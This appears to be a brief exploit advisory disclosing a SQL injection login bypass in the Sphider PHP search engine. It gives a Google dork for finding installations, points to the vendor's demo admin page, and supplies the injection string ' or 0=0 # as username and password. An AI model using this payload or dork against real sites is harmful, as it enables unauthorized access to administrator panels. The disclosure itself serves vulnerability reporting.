Sphider SQL injection vulnerabilties

vendor: www.sphider.eu
Author: Karthik R (3psil0nLambDa)
Email:  Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork:  © Ando Saabas 2005-2007

Description about the Sphider

Sphider is a lightweight web spider and search engine written in PHP, using MySQL as its back end database. It is a great tool for adding search functionality to your web site or building your custom search engine. Sphider is small, easy to set up and modify, and is used in thousands of websites across the world. 

Exploits:

SQLi Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the http://www.sphider.eu/demo.php section of the site.

Exploit: Username: ' or 0=0 #
            Password: ' or 0=0 #
-----------------------------------------------------------------------------------------------------------------------------
Tribite to side^effects and love to taashu.
-----------------------------------------------------------------------------------------------------------------------------